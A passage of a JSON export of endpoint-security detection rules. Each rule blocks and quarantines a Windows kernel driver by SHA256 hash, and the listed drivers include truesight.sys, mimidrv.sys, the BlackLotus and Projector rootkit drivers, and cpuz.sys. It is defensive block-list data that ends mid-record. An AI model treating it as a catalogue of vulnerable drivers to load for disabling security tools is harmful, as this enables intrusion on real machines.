+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978135Z",
+ "creation_date": "2026-03-23T11:45:29.978137Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978143Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "749b0e8c8c8b7dda8c2063c708047cfe95afa0a4d86886b31a12f3018396e67c",
+ "comment": "Malicious Kernel Driver (aka 0x3040_blacklotus_beta_driver.sys) [https://www.loldrivers.io/drivers/8750b245-af35-4bc6-9af3-dc858f9db64f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6dd4a3c5-140b-5d17-a24d-fd64ee2e0520",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835295Z",
+ "creation_date": "2026-03-23T11:45:30.835298Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835307Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6a907bd5cddfab8ee41a02f6ad9ba6c6848bd9c1017611435f0867b2e236a07b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6df6947b-6884-599d-a679-8e99d41f1d64",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968004Z",
+ "creation_date": "2026-03-23T11:45:29.968006Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968012Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0f5e3d33c824f9f03d038b4f1a376b15cc5f1694aef086bd17c516ad951fc45a",
+ "comment": "Projector Rootkit malicious drivers (aka KB_VRX_deviced.sys) [https://twitter.com/struppigel/status/1551503748601729025] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6e085625-9299-5c1f-b73a-32e977660209",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146778Z",
+ "creation_date": "2026-03-23T11:45:31.146779Z",
+ "enabled": true,
+ 
"block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146785Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "54d5272af19864d81cd4902d76a651510c7d58295e5f4fb2f8053ebe499982dd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6e0da02f-47bb-5feb-b522-3b11714163d7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153489Z",
+ "creation_date": "2026-03-23T11:45:31.153491Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153496Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "51fcbd96e216fb82900db6ea5046a89cec680c8965f0d9a26e1aedf71acbf8eb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6e17fc26-e435-5bc8-9f39-99be4e3ebaf6",
+ 
"test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973357Z",
+ "creation_date": "2026-03-23T11:45:29.973359Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973365Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fabe94809d90ade89dad012b22243e3fb755a131800140f8f8b30c989c371301",
+ "comment": "Voicemod Sociedad Limitada vulnerable driver (aka vmdrv.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6e26a745-2dd2-5fa6-8655-b3ea3b7f88b7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153701Z",
+ "creation_date": "2026-03-23T11:45:31.153703Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ 
"hl_testing_start_time": "2026-03-23T11:45:31.153708Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "28e471f0741ecac18102c0a407310d53cf0e962965adaafa53123b9bf349fe5e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6e2710d7-b12f-51d8-b333-db37338c9f71",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155154Z",
+ "creation_date": "2026-03-23T11:45:31.155156Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155161Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1f55e87dc3ccf449c3df04a227b3c38f0ab151563904ec75faf09a9e6ad81b69",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6e346ae4-4915-574b-9971-1aed1c11c946",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": 
"quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827586Z",
+ "creation_date": "2026-03-23T11:45:31.827588Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827593Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1508b3bcd0368bc487e0af59f88148f2e5a16685d1ca05d5aa0d9aa982999493",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6e4d6306-3ea4-5396-b5a1-97895f1bc71d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154978Z",
+ "creation_date": "2026-03-23T11:45:31.154980Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154986Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ 
"rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8970d3c8889a4f6d7bb6228d331f0f30de2a7f6a287b37d23a20cd12d36eb728",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6e64165c-5713-53f9-8c1c-537b25014d5a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823536Z",
+ "creation_date": "2026-03-23T11:45:30.823538Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823544Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "852d83d1cb676d150286edb1eccc7dba4c5acc06027361f96721a0a75f1a7884",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6e675e6c-80b2-57f4-9d94-7db2e39d9d0e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823644Z", + "creation_date": "2026-03-23T11:45:30.823647Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823652Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "456216f68ea370a72c5a4994b64809114edad1357cea269af57b96b44923a484", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6e75b3b5-c905-5cd5-b67d-d0b91e2eb598", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.472980Z", + "creation_date": "2026-03-23T11:45:30.472983Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.472992Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "53bd8e8d3542fcf02d09c34282ebf97aee9515ee6b9a01cefd81baa45c6fd3d6", 
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6e81b540-f4fe-5c58-b988-c69ab84fbde5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980271Z", + "creation_date": "2026-03-23T11:45:29.980273Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980279Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9eba5d1545fdbf37cf053ac3f3ba45bcb651b8abb7805cbfdfb5f91ea294fb95", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6e96b5c3-e155-5b2b-bd3a-0ce0eb7cc6e8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487080Z", + "creation_date": 
"2026-03-23T11:45:31.487083Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487092Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "44d76b4ee4e9a0ad0eb3c40fc6ae66d91c33155da86b5f15a6ebd9564cf30130", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6e9ce2a7-c644-5130-9db4-b0d56ee11bf7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151754Z", + "creation_date": "2026-03-23T11:45:31.151757Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151764Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "baa6847981a0c77a1c657431167a43ebcfd0ffe32ddf8379f6a65315c34a549d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "6e9e3066-2f4b-5fad-b9e4-2e8a0cd60ab5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489040Z", + "creation_date": "2026-03-23T11:45:31.489042Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489047Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a36482e8713d29d620b8b759812324d74fa63ce221ff518f807f3f3db569b3d7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6e9e5995-7311-57d2-b4c6-b18b5e1b8fad", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976800Z", + "creation_date": "2026-03-23T11:45:29.976802Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976808Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0c8a373fff42c69f51cc4ae12295df8b75e7e29fd4956dbc3582bf284b883ddc", + "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6edd5a8a-4119-5801-b4db-40292f8839d6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827975Z", + "creation_date": "2026-03-23T11:45:30.827978Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827983Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dd72a998f433f807dc5ee331a52286717f787f6c5c9e22491f8bd685e0da2f66", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6ef08fe4-c3ab-5896-a9b1-a2fda92ab558", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464202Z", + "creation_date": "2026-03-23T11:45:30.464215Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464229Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c4c9c84b211899ceb0d18a839afa497537a7c7c01ab481965a09788a9e16590c", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6efc3165-2e4f-56e2-8964-a9876ad1855f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479650Z", + "creation_date": "2026-03-23T11:45:30.479651Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479657Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "4a367f9af0d4995eafb7bbdb4fa60eee88e470f7192276d3d66afc58f75013e1", + "comment": "Malicious Kernel Driver (aka be6318413160e589080df02bb3ca6e6a.sys) [https://www.loldrivers.io/drivers/a9ab4412-d484-459b-be97-5975f5ab8094/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6efe81ff-6906-5491-b055-b2775cb049a0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815069Z", + "creation_date": "2026-03-23T11:45:31.815072Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815081Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "12a4df784e6e897c36a4d074175c39d03c9ba5cd5ca37f27f50b70b7ab6b43a6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6f208011-1eda-526c-8dae-a818d0881f57", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.500230Z", + "creation_date": "2026-03-23T11:45:31.500233Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.500241Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "975092496ce4f4c728aab097f43433ce212e947e69e87f04391f6d9ab38d3a85", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6f295f21-f9f8-5b86-86f3-6bfa096432bd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459356Z", + "creation_date": "2026-03-23T11:45:30.459359Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459368Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 